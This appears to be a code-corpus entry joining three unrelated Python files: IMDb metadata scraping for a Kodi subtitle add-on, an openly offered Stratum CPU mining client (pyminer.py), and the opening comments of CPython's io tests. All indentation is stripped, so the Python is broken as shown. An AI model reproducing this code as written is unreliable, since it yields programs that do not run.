(year_start is not None and year_start <= episode_year) and
(year_end == '' or int(year_end) >= episode_year)
)
results = list(filter(filter_tvshow_results, results['d']))
if len(results) == 0:
return
if len(results) == 1:
meta.tvshow_year = str(results[0]['y'])
meta.imdb_id = results[0]['id']
return
episode_title_pattern = r'title=\"' + re.escape(episode_title) + r'\"'
for result in results:
episodes_response = core.request.execute(core, {
'method': 'GET',
'url': 'https://www.imdb.com/title/%s/episodes/_ajax?season=%s' % (result['id'], meta.season),
'timeout': 10
})
if episodes_response.status_code != 200:
continue
if re.search(episode_title_pattern, episodes_response.text, re.IGNORECASE):
meta.tvshow_year = str(result['y'])
meta.imdb_id = result['id']
return
def __update_info_from_imdb(core, meta, pagination_token=''):
request = {
'method': 'POST',
'url': 'https://graphql.imdb.com',
'data': core.json.dumps({
'query': '''
query TitlesList($idArray: [ID!]!, $paginationToken: ID) {
titles(ids: $idArray) {
id
titleText {
text
}
releaseDate {
year
}
series {
series {
id,
titleText {
text
}
releaseDate {
year
}
}
episodeNumber {
episodeNumber
seasonNumber
}
}
episodes {
...TMD_Episodes_EpisodesCardContainer
}
}
}
fragment TMD_Episodes_EpisodesCardContainer on Episodes {
result: episodes(first: 250, after: $paginationToken) {
edges {
node {
...TMD_Episodes_EpisodeCard
}
}
pageInfo {
hasNextPage
endCursor
}
}
}
fragment TMD_Episodes_EpisodeCard on Title {
id
titleText {
text
}
releaseDate {
year
}
series {
episodeNumber {
episodeNumber
seasonNumber
}
}
}
''',
'operationName': 'TitlesList',
'variables': {
'idArray': [meta.imdb_id],
'paginationToken': pagination_token
},
}),
'headers': {
'content-type': 'application/json',
},
'timeout': 10
}
response = core.request.execute(core, request)
if response.status_code != 200:
return
try:
result = json.loads(response.text)
result = result['data']['titles'][0]
if result['episodes'] is None:
meta.title = result['titleText']['text']
meta.year = str(result['releaseDate']['year'])
if result['series'] is not None:
meta.tvshow = result['series']['series']['titleText']['text']
meta.tvshow_year = str(result['series']['series']['releaseDate']['year'])
meta.season = str(result['series']['episodeNumber']['seasonNumber'])
meta.episode = str(result['series']['episodeNumber']['episodeNumber'])
else:
meta.tvshow = result['titleText']['text']
meta.tvshow_year = str(result['releaseDate']['year'])
episodes = result['episodes']['result']['edges']
s_number = int(meta.season)
ep_number = int(meta.episode)
found = False
for episode in episodes:
ep = episode['node']
series = ep['series']['episodeNumber']
if series['episodeNumber'] == ep_number and series['seasonNumber'] == s_number:
meta.title = ep['titleText']['text']
meta.year = str(ep['releaseDate']['year'])
meta.imdb_id = ep['id']
found = True
if not found and result['episodes']['result']['pageInfo']['hasNextPage']:
return __update_info_from_imdb(core, meta, result['episodes']['result']['pageInfo']['endCursor'])
except:
return
def __get_basic_info():
meta = utils.DictAsObject({})
meta.year = xbmc.getInfoLabel('VideoPlayer.Year')
meta.season = xbmc.getInfoLabel('VideoPlayer.Season')
meta.episode = xbmc.getInfoLabel('VideoPlayer.Episode')
meta.tvshow = xbmc.getInfoLabel('VideoPlayer.TVShowTitle')
meta.tvshow_year = ''
meta.title = xbmc.getInfoLabel('VideoPlayer.OriginalTitle')
if meta.title == '':
meta.title = xbmc.getInfoLabel('VideoPlayer.Title')
meta.filename = __get_filename(meta.title)
meta.filename_without_ext = meta.filename
meta.imdb_id = xbmc.getInfoLabel('VideoPlayer.IMDBNumber')
filename_and_path = xbmc.getInfoLabel('Player.FilenameAndPath')
if meta.imdb_id == '':
regex_result = re.search(r'.*(tt\d{7,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.imdb_id = regex_result.group(1)
if meta.season == '':
regex_result = re.search(r'.*season=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.season = regex_result.group(1)
if meta.episode == '':
regex_result = re.search(r'.*episode=(\d{1,}).*', filename_and_path, re.IGNORECASE)
if regex_result:
meta.episode = regex_result.group(1)
return meta
def get_meta(core):
meta = __get_basic_info()
if meta.imdb_id == '':
cache_key = cache.hash_data(meta)
imdb_id_cache = cache.get_imdb_id_cache()
meta.imdb_id = imdb_id_cache.get(cache_key, '')
if meta.imdb_id == '':
__scrape_imdb_id(core, meta)
if meta.imdb_id != '':
imdb_id_cache[cache_key] = meta.imdb_id
cache.save_imdb_id_cache(imdb_id_cache)
if meta.tvshow_year != '':
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_years_cache[meta.imdb_id] = meta.tvshow_year
cache.save_tvshow_years_cache(tvshow_years_cache)
if meta.imdb_id != '':
__update_info_from_imdb(core, meta)
meta_cache = cache.get_meta_cache()
if meta.imdb_id != '' and meta_cache.imdb_id == meta.imdb_id and meta_cache.filename == meta.filename:
meta = meta_cache
else:
meta.filesize = ''
meta.filehash = ''
try:
filepath = xbmc.Player().getPlayingFile()
__set_size_and_hash(core, meta, filepath)
except:
import traceback
traceback.print_exc()
try:
meta.filename_without_ext = os.path.splitext(meta.filename)[0]
except: pass
meta_json = json.dumps(meta, indent=2)
logger.debug(meta_json)
meta = json.loads(meta_json)
meta = utils.DictAsObject(meta)
for key in meta.keys():
value = utils.strip_non_ascii_and_unprintable(meta[key])
meta[key] = str(value).strip()
cache.save_meta_cache(meta)
meta.is_tvshow = meta.tvshow != ''
meta.is_movie = not meta.is_tvshow
tvshow_year_requiring_service_enabled = (
get_bool_setting('podnadpisi', 'enabled') or
get_bool_setting('addic7ed', 'enabled')
)
if meta.is_tvshow and meta.imdb_id != '' and meta.tvshow_year == '' and tvshow_year_requiring_service_enabled:
tvshow_years_cache = cache.get_tvshow_years_cache()
tvshow_year = tvshow_years_cache.get(meta.imdb_id, '')
if tvshow_year != '':
meta.tvshow_year = tvshow_year
else:
meta.tvshow_year_thread = threading.Thread(target=__scrape_tvshow_year, args=(core, meta))
meta.tvshow_year_thread.start()
return meta
|
pyminer.py | # The MIT License (MIT)
#
# Copyright (c) 2014 Richard Moore
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import binascii, json, hashlib, socket, struct, sys, threading, time, urlparse
USER_AGENT = "PyMiner"
VERSION = [0, 1]
# Which algorithm for proof-of-work to use
ALGORITHM_SCRYPT = 'scrypt'
ALGORITHM_SHA256D = 'sha256d'
ALGORITHM_YESCRYPT = 'yescrypt'
ALGORITHMS = [ ALGORITHM_SCRYPT, ALGORITHM_SHA256D, ALGORITHM_YESCRYPT ]
# Verbosity and log level
QUIET = False
DEBUG = False
DEBUG_PROTOCOL = False
LEVEL_PROTOCOL = 'protocol'
LEVEL_INFO = 'info'
LEVEL_DEBUG = 'debug'
LEVEL_ERROR = 'error'
# These control which scrypt implementation to use
SCRYPT_LIBRARY_C = 'scrypt (https://github.com/forrestv/p2pool)'
SCRYPT_LIBRARIES = [ SCRYPT_LIBRARY_C ]
YESCRYPT_LIBRARY_C = 'https://password-hashing.net/submissions/yescrypt-v1.tar.gz'
YESCRYPT_LIBRARIES = [ YESCRYPT_LIBRARY_C ]
WELCOME_MSG = ("If you have found this software useful and would like to support its future\n"
"development, please, feel free to donate:\n\n"
" BTC: 1HKWV5t4KGUwybVHNUaaY9TXFSoBvoaSiP\n"
" ETH: 0xF17e490B391E17BE2D14BFfaA831ab8966d2e689\n"
" LTC: LNSEJzT8byYasZGd4f9c3DgtMbmexnXHdy\n"
" BCH: 1AVXvPBrNdhTdwBN5VQT5LSHa7sEzMSia4\n"
" XEM: NB3NDXRBOLEJLPT6MP6JAD4EZEOX5TFLDG3WR7JJ\n"
" MONA: MPq54r8XTwtB2qmAeVqayy27ZCaPt845B6\n"
" KOTO: k1GHJkvxLQocac94MFBbKAsdUvNbFdFWUyE\n"
" NEET: NYaP7eEsDdALK5eHPZkYk1d8pBLyGvq9L1\n\n"
"Happy mining!")
def log(message, level):
'''Conditionally write a message to stdout based on command line options and level.'''
global DEBUG
global DEBUG_PROTOCOL
global QUIET
if QUIET and level != LEVEL_ERROR: return
if not DEBUG_PROTOCOL and level == LEVEL_PROTOCOL: return
if not DEBUG and level == LEVEL_DEBUG: return
if level != LEVEL_PROTOCOL: message = '[%s] %s' % (level.upper(), message)
print ("[%s] %s" % (time.strftime("%Y-%m-%d %H:%M:%S"), message))
# Convert from/to binary and hexadecimal strings (could be replaced with .encode('hex') and .decode('hex'))
hexlify = binascii.hexlify
unhexlify = binascii.unhexlify
def sha256d(message):
'''Double SHA256 Hashing function.'''
return hashlib.sha256(hashlib.sha256(message).digest()).digest()
def swap_endian_word(hex_word):
'''Swaps the endianness of a hexadecimal string of a word and converts it to a binary string.'''
message = unhexlify(hex_word)
if len(message) != 4: raise ValueError('Must be 4-byte word')
return message[::-1]
def swap_endian_words(hex_words):
'''Swaps the endianness of a hexadecimal string of words and converts it to a binary string.'''
message = unhexlify(hex_words)
if len(message) % 4 != 0: raise ValueError('Must be 4-byte word aligned')
return ''.join([ message[4 * i: 4 * i + 4][::-1] for i in range(0, len(message) // 4) ])
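# Worked example (a sketch): swap_endian_word('aabbccdd') unhexlifies to
# '\xaa\xbb\xcc\xdd' and returns the reversed word '\xdd\xcc\xbb\xaa';
# swap_endian_words applies the same reversal to every 4-byte word.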
def human_readable_hashrate(hashrate):
'''Returns a human readable representation of hashrate.'''
if hashrate < 1000:
return '%2f hashes/s' % hashrate
if hashrate < 10000000:
return '%2f khashes/s' % (hashrate / 1000)
if hashrate < 10000000000:
return '%2f Mhashes/s' % (hashrate / 1000000)
return '%2f Ghashes/s' % (hashrate / 1000000000)
SCRYPT_LIBRARY = None
scrypt_proof_of_work = None
def set_scrypt_library():
'''Sets the scrypt library implementation to use.'''
global SCRYPT_LIBRARY
global scrypt_proof_of_work
import scrypt
scrypt_proof_of_work = scrypt.getPoWHash
SCRYPT_LIBRARY = SCRYPT_LIBRARY_C
set_scrypt_library()
class Job(object):
'''Encapsulates a Job from the network and necessary helper methods to mine.
"If you have a procedure with 10 parameters, you probably missed some."
~Alan Perlis
'''
def __init__(
self,
job_id,
prevhash,
coinb1,
coinb2,
merkle_branches,
version,
nbits,
ntime,
target,
extranonce1,
extranonce2_size,
proof_of_work,
max_nonce=0x7fffffff,
):
# Job parts from the mining.notify command
self._job_id = job_id
self._prevhash = prevhash
self._coinb1 = coinb1
self._coinb2 = coinb2
self._merkle_branches = [ b for b in merkle_branches ]
self._version = version
self._nbits = nbits
self._ntime = ntime
self._max_nonce = max_nonce
# Job information needed to mine from mining.subscribe
self._target = target
self._extranonce1 = extranonce1
self._extranonce2_size = extranonce2_size
# Proof of work algorithm
self._proof_of_work = proof_of_work
# Flag to stop this job's mine coroutine
self._done = False
# Hash metrics (start time, delta time, total hashes)
self._dt = 0.0
self._hash_count = 0
# Accessors
id = property(lambda s: s._job_id)
prevhash = property(lambda s: s._prevhash)
coinb1 = property(lambda s: s._coinb1)
coinb2 = property(lambda s: s._coinb2)
merkle_branches = property(lambda s: [ b for b in s._merkle_branches ])
version = property(lambda s: s._version)
nbits = property(lambda s: s._nbits)
ntime = property(lambda s: s._ntime)
target = property(lambda s: s._target)
extranonce1 = property(lambda s: s._extranonce1)
extranonce2_size = property(lambda s: s._extranonce2_size)
proof_of_work = property(lambda s: s._proof_of_work)
@property
def hashrate(self):
'''The current hashrate, or, if stopped, the average hashrate over the job's lifetime.'''
if self._dt == 0: return 0.0
return self._hash_count / self._dt
def merkle_root_bin(self, extranonce2_bin):
'''Builds a merkle root from the merkle tree'''
coinbase_bin = unhexlify(self._coinb1) + unhexlify(self._extranonce1) + extranonce2_bin + unhexlify(self._coinb2)
coinbase_hash_bin = sha256d(coinbase_bin)
merkle_root = coinbase_hash_bin
for branch in self._merkle_branches:
merkle_root = sha256d(merkle_root + unhexlify(branch))
return merkle_root
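# The merkle root above is built stratum-style: the coinbase transaction is
# assembled as coinb1 + extranonce1 + extranonce2 + coinb2, double-SHA256
# hashed, and then each supplied merkle branch is folded in with another
# double-SHA256.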
def stop(self):
'''Requests the mine coroutine stop after its current iteration.'''
self._done = True
def mine(self, nonce_start=0, nonce_stride=1):
'''Returns an iterator that iterates over valid proof-of-work shares.
This is a coroutine that takes a LONG time; the calling thread should look like:
for result in job.mine(self):
submit_work(result)
nonce_start and nonce_stride are useful for multi-processing if you would like
to assign each process a different starting nonce (0, 1, 2, ...) and a stride
equal to the number of processes.
'''
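# For example (not part of the original flow): with 4 worker processes,
# process k would call job.mine(nonce_start=k, nonce_stride=4) so that the
# nonce space is partitioned without overlap.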
t0 = time.time()
# @TODO: test for extranonce != 0... Do I reverse it or not?
for extranonce2 in xrange(self._max_nonce):
# Must be unique for any given job id, according to http://mining.bitcoin.cz/stratum-mining/, but this never seems to be enforced.
extranonce2_bin = struct.pack('<I', extranonce2)
merkle_root_bin = self.merkle_root_bin(extranonce2_bin)
header_prefix_bin = swap_endian_word(self._version) + swap_endian_words(self._prevhash) + merkle_root_bin + swap_endian_word(self._ntime) + swap_endian_word(self._nbits)
for nonce in xrange(nonce_start, self._max_nonce, nonce_stride):
# This job has been asked to stop
if self._done:
self._dt += (time.time() - t0)
raise StopIteration()
# Proof-of-work attempt
nonce_bin = struct.pack('<I', nonce)
pow = self.proof_of_work(header_prefix_bin + nonce_bin)[::-1].encode('hex')
# Did we reach or exceed our target?
if pow <= self.target:
result = dict(
job_id = self.id,
extranonce2 = hexlify(extranonce2_bin),
ntime = str(self._ntime), # Convert to str from json unicode
nonce = hexlify(nonce_bin[::-1])
)
self._dt += (time.time() - t0)
yield result
t0 = time.time()
self._hash_count += 1
def __str__(self):
return '<Job id=%s prevhash=%s coinb1=%s coinb2=%s merkle_branches=%s version=%s nbits=%s ntime=%s target=%s extranonce1=%s extranonce2_size=%d>' % (self.id, self.prevhash, self.coinb1, self.coinb2, self.merkle_branches, self.version, self.nbits, self.ntime, self.target, self.extranonce1, self.extranonce2_size)
# Subscription state
class Subscription(object):
'''Encapsulates the Subscription state from the JSON-RPC server'''
_max_nonce = None
# Subclasses should override this
def ProofOfWork(header):
raise Exception('Do not use the Subscription class directly, subclass it')
class StateException(Exception): pass
def __init__(self):
self._id = None
self._difficulty = None
self._extranonce1 = None
self._extranonce2_size = None
self._target = None
self._worker_name = None
self._mining_thread = None
# Accessors
id = property(lambda s: s._id)
worker_name = property(lambda s: s._worker_name)
difficulty = property(lambda s: s._difficulty)
target = property(lambda s: s._target)
extranonce1 = property(lambda s: s._extranonce1)
extranonce2_size = property(lambda s: s._extranonce2_size)
def set_worker_name(self, worker_name):
if self._worker_name:
raise self.StateException('Already authenticated as %r (requesting %r)' % (self._worker_name, worker_name))
self._worker_name = worker_name
def _set_target(self, target):
self._target = '%064x' % target
def set_difficulty(self, difficulty):
if difficulty < 0: raise self.StateException('Difficulty must be non-negative')
# Compute target
if difficulty == 0:
target = 2 ** 256 - 1
else:
target = min(int((0xffff0000 * 2 ** (256 - 64) + 1) / difficulty - 1 + 0.5), 2 ** 256 - 1)
self._difficulty = difficulty
self._set_target(target)
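# In other words, the pool's difficulty maps to a share target of roughly
# (0xffff0000 << 192) / difficulty, so doubling the difficulty halves the
# number of hashes that count as valid shares.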
def set_subscription(self, subscription_id, extranonce1, extranonce2_size):
if self._id is not None:
raise self.StateException('Already subscribed')
self._id = subscription_id
self._extranonce1 = extranonce1
self._extranonce2_size = extranonce2_size
def create_job(self, job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime):
'''Creates a new Job object populated with all the goodness it needs to mine.'''
if self._id is None:
raise self.StateException('Not subscribed')
return Job(
job_id=job_id,
prevhash=prevhash,
coinb1=coinb1,
coinb2=coinb2,
merkle_branches=merkle_branches,
version=version,
nbits=nbits,
ntime=ntime,
target=self.target,
extranonce1=self._extranonce1,
extranonce2_size=self.extranonce2_size,
proof_of_work=self.ProofOfWork,
max_nonce=self._max_nonce,
)
def __str__(self):
return '<Subscription id=%s, extranonce1=%s, extranonce2_size=%d, difficulty=%d worker_name=%s>' % (self.id, self.extranonce1, self.extranonce2_size, self.difficulty, self.worker_name)
class SubscriptionScrypt(Subscription):
'''Subscription for Scrypt-based coins, like Litecoin.'''
ProofOfWork = lambda s, h: scrypt_proof_of_work(h)
_max_nonce = 0x7fffffff
def _set_target(self, target):
# Why multiply by 2**16? See: https://litecoin.info/Mining_pool_comparison
self._target = '%064x' % (target << 16)
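# (Scrypt pools conventionally state share difficulty on a scale 2**16 times
# the sha256d one, hence the shift; see the link above.)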
class SubscriptionSHA256D(Subscription):
'''Subscription for Double-SHA256-based coins, like Bitcoin.'''
ProofOfWork = sha256d
class SubscriptionYescrypt(Subscription):
'''Subscription for Yescrypt-based coins.'''
import yescrypt
ProofOfWork = yescrypt.getPoWHash
_max_nonce = 0x3fffff
def _set_target(self, target):
self._target = '%064x' % (target << 16)
# Maps algorithms to their respective subscription objects
SubscriptionByAlgorithm = {
ALGORITHM_SCRYPT: SubscriptionScrypt,
ALGORITHM_SHA256D: SubscriptionSHA256D,
ALGORITHM_YESCRYPT: SubscriptionYescrypt,
}
class SimpleJsonRpcClient(object):
'''Simple JSON-RPC client.
To use this class:
1) Create a sub-class
2) Override handle_reply(self, request, reply)
3) Call connect(socket)
Use self.send(method, params) to send JSON-RPC commands to the server.
A new thread is created for listening to the connection, so calls to handle_reply
are synchronized. It is safe to call send from within handle_reply.
'''
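# A minimal, purely illustrative subclass might look like this (hypothetical,
# not used anywhere in this file):
#
#     class EchoClient(SimpleJsonRpcClient):
#         def handle_reply(self, request, reply):
#             log('reply: %r' % reply, LEVEL_DEBUG)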
class ClientException(Exception): pass
class RequestReplyException(Exception):
def __init__(self, message, reply, request = None):
Exception.__init__(self, message)
self._reply = reply
self._request = request
request = property(lambda s: s._request)
reply = property(lambda s: s._reply)
class RequestReplyWarning(RequestReplyException):
'''Sub-classes can raise this to inform the user of JSON-RPC server issues.'''
pass
def __init__(self):
self._socket = None
self._lock = threading.RLock()
self._rpc_thread = None
self._message_id = 1
self._requests = dict()
def _handle_incoming_rpc(self):
data = ""
while True:
# Get the next line if we have one, otherwise, read and block
if '\n' in data:
(line, data) = data.split('\n', 1)
else:
chunk = self._socket.recv(1024)
data += chunk
continue
log('JSON-RPC Server > ' + line, LEVEL_PROTOCOL)
# Parse the JSON
try:
reply = json.loads(line)
except Exception, e:
log("JSON-RPC Error: Failed to parse JSON %r (skipping)" % line, LEVEL_ERROR)
continue
try:
request = None
with self._lock:
if 'id' in reply and reply['id'] in self._requests:
request = self._requests[reply['id']]
self.handle_reply(request = request, reply = reply)
except self.RequestReplyWarning, e:
output = e.message
if e.request:
try:
output += '\n ' + e.request
except TypeError:
output += '\n ' + str(e.request)
output += '\n ' + e.reply
log(output, LEVEL_ERROR)
def handle_reply(self, request, reply):
# Override this method in sub-classes to handle a message from the server
raise self.RequestReplyWarning('Override this method')
def send(self, method, params):
'''Sends a message to the JSON-RPC server'''
if not self._socket:
raise self.ClientException('Not connected')
request = dict(id = self._message_id, method = method, params = params)
message = json.dumps(request)
with self._lock:
self._requests[self._message_id] = request
self._message_id += 1
self._socket.send(message + '\n')
log('JSON-RPC Server < ' + message, LEVEL_PROTOCOL)
return request
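# NOTE: the protocol is newline-delimited JSON; send() appends '\n' above and
# _handle_incoming_rpc() splits incoming data on '\n' to recover one reply
# per line.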
def connect(self, socket):
'''Connects to a remote JSON-RPC server'''
if self._rpc_thread:
raise self.ClientException('Already connected')
self._socket = socket
self._rpc_thread = threading.Thread(target = self._handle_incoming_rpc)
self._rpc_thread.daemon = True
self._rpc_thread.start()
# Miner client
class Miner(SimpleJsonRpcClient):
'''Simple mining client'''
class MinerWarning(SimpleJsonRpcClient.RequestReplyWarning):
def __init__(self, message, reply, request = None):
SimpleJsonRpcClient.RequestReplyWarning.__init__(self, 'Mining State Error: ' + message, reply, request)
class MinerAuthenticationException(SimpleJsonRpcClient.RequestReplyException): pass
def __init__(self, url, username, password, algorithm=ALGORITHM_YESCRYPT):
SimpleJsonRpcClient.__init__(self)
self._url = url
self._username = username
self._password = password
self._subscription = SubscriptionByAlgorithm[algorithm]()
self._job = None
self._accepted_shares = 0
# Accessors
url = property(lambda s: s._url)
username = property(lambda s: s._username)
password = property(lambda s: s._password)
# Overridden from SimpleJsonRpcClient
def handle_reply(self, request, reply):
# New work, stop what we were doing before, and start on this.
if reply.get('method') == 'mining.notify':
if 'params' not in reply or len(reply['params']) != 9:
raise self.MinerWarning('Malformed mining.notify message', reply)
(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime, clean_jobs) = reply['params']
self._spawn_job_thread(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime)
log('New job: job_id=%s' % job_id, LEVEL_DEBUG)
# The server wants us to change our difficulty (on all *future* work)
elif reply.get('method') == 'mining.set_difficulty':
if 'params' not in reply or len(reply['params']) != 1:
raise self.MinerWarning('Malformed mining.set_difficulty message', reply)
(difficulty, ) = reply['params']
self._subscription.set_difficulty(difficulty)
log('Change difficulty: difficulty=%s' % difficulty, LEVEL_DEBUG)
# This is a reply to...
elif request:
# ...subscribe; set-up the work and request authorization
if request.get('method') == 'mining.subscribe':
if 'result' not in reply or len(reply['result']) != 3 or len(reply['result'][0]) != 2:
raise self.MinerWarning('Reply to mining.subscribe is malformed', reply, request)
((mining_notify, subscription_id), extranonce1, extranonce2_size) = reply['result']
self._subscription.set_subscription(subscription_id, extranonce1, extranonce2_size)
log('Subscribed: subscription_id=%s' % subscription_id, LEVEL_DEBUG)
# Request authentication
self.send(method = 'mining.authorize', params = [ self.username, self.password ])
# ...authorize; if we failed to authorize, quit
elif request.get('method') == 'mining.authorize':
if 'result' not in reply or not reply['result']:
raise self.MinerAuthenticationException('Failed to authenticate worker', reply, request)
worker_name = request['params'][0]
self._subscription.set_worker_name(worker_name)
log('Authorized: worker_name=%s' % worker_name, LEVEL_DEBUG)
# ...submit; complain if the server didn't accept our submission
elif request.get('method') == 'mining.submit':
if 'result' not in reply or not reply['result']:
log('Share - Invalid', LEVEL_INFO)
raise self.MinerWarning('Failed to accept submit', reply, request)
self._accepted_shares += 1
log('Accepted shares: %d' % self._accepted_shares, LEVEL_INFO)
# ??? *shrug*
else:
raise self.MinerWarning('Unhandled message', reply, request)
# ??? *double shrug*
else:
raise self.MinerWarning('Bad message state', reply)
def _spawn_job_thread(self, job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime):
'''Stops any previous job and begins a new job.'''
# Stop the old job (if any)
if self._job: self._job.stop()
# Create the new job
self._job = self._subscription.create_job(
job_id = job_id,
prevhash = prevhash,
coinb1 = coinb1,
coinb2 = coinb2,
merkle_branches = merkle_branches,
version = version,
nbits = nbits,
ntime = ntime
)
def run(job):
try:
for result in job.mine():
params = [ self._subscription.worker_name ] + [ result[k] for k in ('job_id', 'extranonce2', 'ntime', 'nonce') ]
self.send(method = 'mining.submit', params = params)
log("Found share: " + str(params), LEVEL_INFO)
log("Hashrate: %s" % human_readable_hashrate(job.hashrate), LEVEL_INFO)
except Exception, e:
log("ERROR: %s" % e, LEVEL_ERROR)
thread = threading.Thread(target = run, args = (self._job, ))
thread.daemon = True
thread.start()
@staticmethod
def welcome_msg():
log(WELCOME_MSG, LEVEL_INFO)
def serve_forever(self):
'''Begins the miner. This method does not return.'''
# Figure out the hostname and port
url = urlparse.urlparse(self.url)
hostname = url.hostname or ''
port = url.port or 9333
self.welcome_msg()
log('Connecting to server %s:%d' % (hostname, port), LEVEL_INFO)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
self.connect(sock)
self.send(method = 'mining.subscribe', params = [ "%s/%s" % (USER_AGENT, '.'.join(str(p) for p in VERSION)) ])
# Forever...
while True:
time.sleep(10)
def test_subscription():
'''Test harness for mining, using a known valid share.'''
log('TEST: Scrypt algorithm = %r' % SCRYPT_LIBRARY, LEVEL_DEBUG)
log('TEST: Testing Subscription', LEVEL_DEBUG)
subscription = SubscriptionScrypt()
# Set up the subscription
reply = json.loads('{"error": null, "id": 1, "result": [["mining.notify", "ae6812eb4cd7735a302a8a9dd95cf71f"], "f800880e", 4]}')
log('TEST: %r' % reply, LEVEL_DEBUG)
((mining_notify, subscription_id), extranonce1, extranonce2_size) = reply['result']
subscription.set_subscription(subscription_id, extranonce1, extranonce2_size)
# Set the difficulty
reply = json.loads('{"params": [32], "id": null, "method": "mining.set_difficulty"}')
log('TEST: %r' % reply, LEVEL_DEBUG)
(difficulty, ) = reply['params']
subscription.set_difficulty(difficulty)
# Create a job
reply = json.loads('{"params": ["1db7", "0b29bfff96c5dc08ee65e63d7b7bab431745b089ff0cf95b49a1631e1d2f9f31", "01000000010000000000000000000000000000000000000000000000000000000000000000ffffffff2503777d07062f503253482f0405b8c75208", "0b2f436f696e48756e74722f0000000001603f352a010000001976a914c633315d376c20a973a758f7422d67f7bfed9c5888ac00000000", ["f0dbca1ee1a9f6388d07d97c1ab0de0e41acdf2edac4b95780ba0a1ec14103b3", "8e43fd2988ac40c5d97702b7e5ccdf5b06d58f0e0d323f74dd5082232c1aedf7", "1177601320ac928b8c145d771dae78a3901a089fa4aca8def01cbff747355818", "9f64f3b0d9edddb14be6f71c3ac2e80455916e207ffc003316c6a515452aa7b4", "2d0b54af60fad4ae59ec02031f661d026f2bb95e2eeb1e6657a35036c017c595"], "00000002", "1b148272", "52c7b81a", true], "id": null, "method": "mining.notify"}')
log('TEST: %r' % reply, LEVEL_DEBUG)
(job_id, prevhash, coinb1, coinb2, merkle_branches, version, nbits, ntime, clean_jobs) = reply['params']
job = subscription.create_job(
job_id = job_id,
prevhash = prevhash,
coinb1 = coinb1,
coinb2 = coinb2,
merkle_branches = merkle_branches,
version = version,
nbits = nbits,
ntime = ntime
)
# Scan that job (if I broke something, this will run for a long time)
for result in job.mine(nonce_start = 1210450368 - 3):
log('TEST: found share - %r' % repr(result), LEVEL_DEBUG)
break
valid = { 'ntime': '52c7b81a', 'nonce': '482601c0', 'extranonce2': '00000000', 'job_id': u'1db7' }
log('TEST: Correct answer %r' % valid, LEVEL_DEBUG)
# CLI for cpu mining
if __name__ == '__main__':
import argparse
# Parse the command line
parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
"If you like this piece of software, please "
"consider supporting its future development via "
"donating to one of the addresses indicated in the "
"README.md file")
parser.add_argument('-o', '--url', help = 'stratum mining server url (eg: stratum+tcp://foobar.com:3333)')
parser.add_argument('-u', '--user', dest = 'username', default = '', help = 'username for mining server', metavar = "USERNAME")
parser.add_argument('-p', '--pass', dest = 'password', default = '', help = 'password for mining server', metavar = "PASSWORD")
parser.add_argument('-O', '--userpass', help = 'username:password pair for mining server', metavar = "USERNAME:PASSWORD")
parser.add_argument('-a', '--algo', default = ALGORITHM_SCRYPT, choices = ALGORITHMS, help = 'hashing algorithm to use for proof of work')
parser.add_argument('-B', '--background', action ='store_true', help = 'run in the background as a daemon')
parser.add_argument('-q', '--quiet', action ='store_true', help = 'suppress non-errors')
parser.add_argument('-P', '--dump-protocol', dest = 'protocol', action ='store_true', help = 'show all JSON-RPC chatter')
parser.add_argument('-d', '--debug', action ='store_true', help = 'show extra debug information')
parser.add_argument('-v', '--version', action = 'version', version = '%s/%s' % (USER_AGENT, '.'.join(str(v) for v in VERSION)))
options = parser.parse_args(sys.argv[1:])
message = None
# Get the username/password
username = options.username
password = options.password
if options.userpass:
if username or password:
message = 'May not use -O/--userpass in conjunction with -u/--user or -p/--pass'
else:
try:
(username, password) = options.userpass.split(':')
except Exception, e:
message = 'Could not parse username:password for -O/--userpass'
# Was there an issue? Show the help screen and exit.
if message:
parser.print_help()
print
print message
sys.exit(1)
# Set the logging level
if options.debug: DEBUG = True
if options.protocol: DEBUG_PROTOCOL = True
if options.quiet: QUIET = True
if DEBUG:
for library in SCRYPT_LIBRARIES:
set_scrypt_library()
test_subscription()
# Set us to a faster library if available
set_scrypt_library()
if options.algo == ALGORITHM_SCRYPT:
log('Using scrypt library %r' % SCRYPT_LIBRARY, LEVEL_DEBUG)
# They want a daemon, give them a daemon
if options.background:
import os
if os.fork() or os.fork(): sys.exit()
# Heigh-ho, heigh-ho, it's off to work we go...
if options.url:
miner = Miner(options.url, username, password, algorithm = options.algo)
miner.serve_forever()
|
test_io.py | """Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
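# For instance (a minimal sketch of the pattern, mirroring the classes below):
#
#     class ExampleTest(unittest.TestCase):
#         tp = None  # bound to the implementation under test by subclasses
#     class CExampleTest(ExampleTest):
#         tp = io.BytesIO
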